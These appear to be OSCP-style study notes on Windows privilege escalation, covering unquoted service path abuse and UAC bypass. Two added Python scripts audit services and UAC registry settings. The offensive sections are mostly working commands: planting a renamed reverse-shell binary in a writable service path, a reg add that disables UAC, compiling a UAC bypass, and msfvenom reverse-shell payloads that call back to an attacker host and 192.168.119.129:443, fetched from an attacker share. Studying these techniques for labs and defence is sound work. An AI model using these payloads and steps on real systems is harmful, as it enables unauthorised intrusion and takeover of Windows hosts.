Unquoted path Manual Exploitation
Example: the C:\Program Files directory, which contains a space character in its name.
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
Service binary paths are listed under the Services section of the WinPEAS output.
You can also list the services with:
net start
wmic service list brief
sc query
Get-Service
Services - Unquoted Paths
Conditions:
Path to service is unquoted and has spaces.
The service runs as LocalSystem or with equivalent administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:
Find all services with "auto" start mode (they start automatically at system start-up):
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:
Find unquoted service binpaths for services that run as ADMIN, e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.
Check if you have FULL/WRITE (F)(W) permissions along the path using:
a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"
b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula
Generate a reverse shell payload and rename it to match the path, e.g. A.exe.
Place the malicious binary in the path so that it is executed, e.g. move A.exe "C:\Program Files\folder".
Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.
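The wmic/findstr one-liner above only spots candidates; what actually matters is which file names Windows tries when it parses the unquoted path, and which directories therefore need their ACLs audited. The following is an added example, not code from the notes above or from WinPEAS: it parses constructed wmic output (service names and paths are made up), flags auto-start services whose PathName is unquoted and contains spaces, expands each into the sequence of files CreateProcess would try (splitting at every space and appending .exe where the prefix has no extension), and lists the parent directories whose write permissions decide whether the condition is exploitable. Paths under C:\Windows are skipped, mirroring the findstr filter in the notes.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `wmic service get name,pathname,displayname,startmode`
# output. wmic prints the requested columns in alphabetical order, padded with
# spaces; every service name and path here is invented for the example.
SAMPLE_WMIC_OUTPUT = r"""
DisplayName        Name        PathName                                              StartMode
A Bad Service      badsvc      C:\Program Files\A bad folder\adminservice.exe        Auto
Good Service       goodsvc     "C:\Program Files\Good Vendor\good.exe"               Auto
Windows Update     wuauserv    C:\Windows\system32\svchost.exe -k netsvcs            Auto
Manual Tool        mansvc      C:\Program Files\Manual Tool\tool.exe                 Manual
"""


def parse_wmic_services(output):
    """Turn wmic's column output into dicts; columns are separated by 2+ spaces."""
    lines = [l.rstrip() for l in output.splitlines() if l.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[1:]:
        fields = re.split(r"\s{2,}", line.strip())
        if len(fields) != len(header):
            continue  # skip anything that does not line up with the header
        rows.append(dict(zip(header, fields)))
    return rows


def is_unquoted_with_spaces(pathname):
    """The precondition from the notes: no surrounding quotes and at least one space."""
    p = pathname.strip()
    return not p.startswith('"') and " " in p


def candidate_paths(pathname):
    """Files Windows tries, in order, for an unquoted path with spaces.

    CreateProcess cuts the string at each space and treats the remainder as
    arguments; a prefix without an extension gets .exe appended. Arguments that
    were part of the original command line cannot be told apart from the path.
    """
    parts = pathname.strip().split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if PureWindowsPath(prefix).suffix == "":
            prefix += ".exe"
        candidates.append(prefix)
    candidates.append(" ".join(parts))  # the binary the admin actually intended
    return candidates


def dirs_to_audit(pathname):
    """Directories whose ACLs decide whether a planted file is picked up first."""
    dirs = []
    for cand in candidate_paths(pathname)[:-1]:
        parent = str(PureWindowsPath(cand).parent)
        if parent not in dirs:
            dirs.append(parent)
    return dirs


def find_unquoted_services(output, skip_windows_dir=True):
    """Auto-start services with an unquoted, space-containing PathName."""
    flagged = []
    for row in parse_wmic_services(output):
        path = row["PathName"]
        if row["StartMode"].lower() != "auto":
            continue
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path):
            flagged.append({
                "name": row["Name"],
                "pathname": path,
                "candidates": candidate_paths(path),
                "audit_dirs": dirs_to_audit(path),
            })
    return flagged


if __name__ == "__main__":
    for svc in find_unquoted_services(SAMPLE_WMIC_OUTPUT):
        print(svc["name"], svc["pathname"])
        for c in svc["candidates"]:
            print("  tries:", c)
        print("  check write ACLs on:", ", ".join(svc["audit_dirs"]))
```

On a real host, feed the function the output of the wmic command from the notes and then run icacls (or accesschk) against each entry in audit_dirs; the fix is to quote the ImagePath (sc config <name> binPath= "\"C:\Program Files\...\svc.exe\"") and remove non-admin write access from those directories.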
User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) may be turned on, which forces your user to respond to UAC credential/consent prompts in order to perform privileged actions.
UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass
cmd> whoami /priv # do we have very few privileges even as local admin?
cmd> whoami /groups # is "Mandatory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?
# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
...
# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
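The three registry values in STEP 1 are read in combination, and the same check is what a defender runs to confirm a host is not sitting on the weak settings. The following is an added example, not code from the notes or from the linked walkthrough: it parses constructed `reg query` output (the values shown are made up but use the documented meanings), returns whether UAC actually enforces a prompt for administrators, and reports drift from the hardened combination EnableLUA=1, ConsentPromptBehaviorAdmin=2 ("Always notify", prompts on the secure desktop) and PromptOnSecureDesktop=1.

```python
# Constructed sample of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System`
# output, trimmed to the values the notes above look at.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser     REG_DWORD    0x3
    EnableLUA                     REG_DWORD    0x1
    PromptOnSecureDesktop         REG_DWORD    0x1
"""

# Documented meanings of ConsentPromptBehaviorAdmin.
CPBA_MEANING = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop (Always notify)",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries only (default)",
}

# The combination a hardened host should show.
HARDENED = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2, "PromptOnSecureDesktop": 1}


def parse_reg_query(output):
    """Parse `reg query` value lines (name, type, data) into a dict; DWORDs become ints."""
    values = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1].startswith("REG_"):
            name, typ, raw = parts
            values[name] = int(raw, 16) if typ == "REG_DWORD" else raw
    return values


def assess_uac(values):
    """Return (prompt_enforced, findings).

    prompt_enforced is False when an administrator gets a full token with no
    prompt at all; otherwise findings list the settings that weaken the prompt.
    Missing values fall back to the Windows defaults (1, 5, 1).
    """
    enable_lua = values.get("EnableLUA", 1)
    cpba = values.get("ConsentPromptBehaviorAdmin", 5)
    secure = values.get("PromptOnSecureDesktop", 1)
    findings = []
    if enable_lua == 0:
        findings.append("EnableLUA=0: UAC is off, administrators run with a full token")
        return False, findings
    if cpba == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: administrators elevate silently")
        return False, findings
    if cpba == 5:
        findings.append("ConsentPromptBehaviorAdmin=5 (default): signed Windows binaries "
                        "auto-elevate without a prompt; level 2 (Always notify) removes that")
    if secure == 0:
        findings.append("PromptOnSecureDesktop=0: prompts are shown on the interactive "
                        "desktop instead of the isolated secure desktop")
    return True, findings


def drift_from_hardened(values):
    """Map each value that differs from HARDENED to (current, expected)."""
    return {k: (values.get(k), v) for k, v in HARDENED.items() if values.get(k) != v}


if __name__ == "__main__":
    vals = parse_reg_query(SAMPLE_REG_OUTPUT)
    enforced, findings = assess_uac(vals)
    print("admin prompt enforced:", enforced)
    print("ConsentPromptBehaviorAdmin:", CPBA_MEANING[vals["ConsentPromptBehaviorAdmin"]])
    for f in findings:
        print(" -", f)
    print("drift:", drift_from_hardened(vals))
```

Any change to these values under HKLM requires administrative rights, so the `reg add ... EnableLUA /d 0` line above is itself a post-elevation action; monitoring writes to this key (Sysmon RegistryEvent or an audit SACL) is the corresponding detection.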
STEP 2: Prepare exploits
# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe
# generate reverse shell payload
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload
cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=443 -f exe > program.exe